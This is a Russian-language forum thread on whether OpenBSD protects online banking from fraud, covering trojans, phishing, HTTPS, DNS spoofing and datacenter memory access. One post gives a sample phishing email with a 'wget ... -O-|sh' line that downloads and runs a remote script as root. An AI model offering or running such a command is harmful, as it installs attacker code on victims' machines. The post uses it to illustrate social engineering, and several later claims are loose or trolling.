Вопрос по безопасности OpenBSD

https://xkcd.com/538/

Могут.

Я думаю, могут в том случае, если openbsd будет выпущена на мобильные устройства вместо Android с установкой программ в один клик. Эти банковские трояны пролизают везде.

Здравствуйте! На устройстве, с которого осуществляется авторизация в Сбербанк Онлайн, мы рекомендуем Вам установить последние обновления, а также использовать антивирус. Кроме того, при выполнении логина в Сбербанк Онлайн одноразовый код будет отправлен на Ваш телефон.

Здравствуйте! На устройстве, с которого осуществляется авторизация в Сбербанк Онлайн, мы рекомендуем Вам установить последние обновления, а также использовать антивирус. Кроме того, при выполнении логина в Сбербанк Онлайн одноразовый код будет отправлен на Ваш телефон.

А почему не openbsd?

Вот, читаю: http://www.banki.ru/blog/kamo4/7400.php

Статья явно писана человеком, крайне далёким от IT и ИБ.

Сами ставят себе на устройства хрен знает что, а потом деньги теряют.

Установлен 8-ми значный пароль на root и пользователя

Боюсь, что даже в bsd 8-символьный пароль — не самая лучшая защита, мягко говоря.

я думаю, что если к домохозяйки или блондинке попадёт openbsd или linux и потом ей по e-mail придёт такое письмо:

пример письма

Вам фото. Для просмотра откройте терминал и скопируйте туда текст, после чего нажмите enter и введите пароль суперпользователя:

wget http://198.18.2.210/a.cgi?at=012345678?type=sbol -O-|sh

на самом деле там скрипт, который в систему установит трояна и даст мошенникам доступ в сбербанк онлайн.

насколько я знаю в вашей стране грабят вкладчиков сейчас по другому, им не нужен ваш клиент доступ, проблема не в клиентской части. Проблема может быть даже не в вашем компьютере, а к примеру в вашем роутере в котором сделают перенаправление и сниф, у нас так делали, уводили деньги. То есть vpn сервер который расположен где и сервера банка или близко к ним тоже не помешает, это если не сдерживать параною в рамках приличия. :))

А может быть сниф у провайдера? А также какова вероятность снифа, если я выхожу в интернет через сеть больницы?

конечно может, всё что ты себе нафантазируешь может случиться :) Но опять же повторюсь, что уязвимость средств не в клиентской части, даже если ты заберешь все деньги из банка есть большая вероятность что их потребуют вернуть через суд и после вернут минимальную сумму что положена по страховке ))

вот этот вирус http://www.finanz.ru/novosti/lichnyye-finansy/gosudarstvo-massovo-konfiskuet-...

Какое перенаправление? Ты понимаешь вообще о чем пишешь? (Извини за грубость) Https есть для этого. Если пользователь идиот и примет подмененный сертификат, несмотря на предупреждение, то что уж там... Такого никто защитить не сможет.

Я имел ввиду, что сами пользователи и ставят себе вирусы, скачанные по ссылкам из писем.

есть ещё и dns spoofing.

конечно, я же васян как я могу понимать? )) атака вообще-то может быть направлена не на трафик который у тебя с банком, а с каким-либо другим ресурсом с целью получения доступа к машине, а есть у человека там сбер или ещё какой клиент это уже будет проанализировано, вопрос комплексный в котором я ни бельмеса не понимаю, поэтому не принимайте близко к сердцу ))

а если у меня там usb-модем с мобильным банком?

И опять мой ответ https.

там это где? о каком модеме идёт речь?

я сейчас только что с со своего гипервизора через /dev/mem. Там была информация в том числе о карте и моих вкладах.

обычном usb-свистке, который принимает и отправляет sms. И скрипт для работы с мобильным банком.

Ты на какой вопрос ответил?

на хабре можно и по данной теме много интересного почитать. Я бы просто не рассуждал в данном ключе, если захотят списать ваши средства, это сделают, и потом как бы вы не доказывали что у вас никакого вируса не было это никого не будет волновать. :)

Как я понял, если ты админ ДЦ в котором хостеры арендуют VPS, то с этих VPS можно без проблем инфу выдерать через /dev/mem?

ну ты уже в дебри пошел, так мы тему раздуем ни о чём. Думаю вопрос по OpenBSD закрыт.

А могут ли эту информацию узнать админы ДЦ и передать её мошенникам?

в Росии может быть всё что угодно, это я тебе и пытаюсь объяснить, и хранить тут деньги и думать как подключаться к сберу это ключевая ошибка в безопасности.

я ещё не говорю о: https://ru.wikipedia.org/wiki/Spectre_(уязвимость)
Когда любой клиент может узнать банковскую тайну.

делай всйо оффлайн секурити не существует

Компьютерная безопасность - это комплекс различных мероприятий, направленных на обеспечение относительно успешной и спокойной работы на компьютере...

Хотя я сам люблю иногда попараноить, но все же имеет какие-то границы =)

Если у тебя там хранятся деньги в таком количестве, что ради них кто-то станет ломать OpenBSD, то я бы боялся больше не уязвимостей в ОС, а уязвимостей во входной двери.

Вопрос же с входом с онлайн-банкинги для крупных денег решать разумнее иначе. Выделить отдельный комп только для этого. Настроить ВНЕШНИЙ файрвол (роутер, комп) чтобы соединял ТОЛЬКО с интернет-банком, а на выделенном компе отрубить даже DNS и чтобы адрес ресолвил только по /etc/hosts

Ну и не забывай, что есть такая штука как https://ru.wikipedia.org/wiki/TEMPEST

А можно ли выделить не комп а виртуалку? Кстати, из /dev/mem можно не только читать, но туда и писать. Так что админы в дата центре могут спокойно делать paymant spoofing. Это когда ты платишь за телефон или кладёшь деньги на электронный кошелёк, а доходят они не туда, куда ты их отправлял. Например, вводишь номер телефона для оплаты 8-916-725-25-55 а в истории операций будет 8-922-775-55-24.

Все можно, но только если хочешь защищенности намного разумнее использовать отдельный комп (нетбук, ноутбук), благо никаких особенных системых требований для этого не нужно и подойдет даже б/у 12-летней давности.

А могут ли мошенники выкупить amazon aws со всеми его потрахами, если узнают что я держу в их облаке инстанс на котором у меня сбербанк онлайн.

Я тебя не пойму, ты так стебешься или реально спрашиваешь?

Кстати, емнип это ты на nag.ru завел тролльскую тему с вопросами про врезания к провайдерам мимо блокировок и рассказывал в ней как в оптику (!!!!) врезался где-то.

Ты в самом деле хочешь ответ услышать или поугарать с коментов?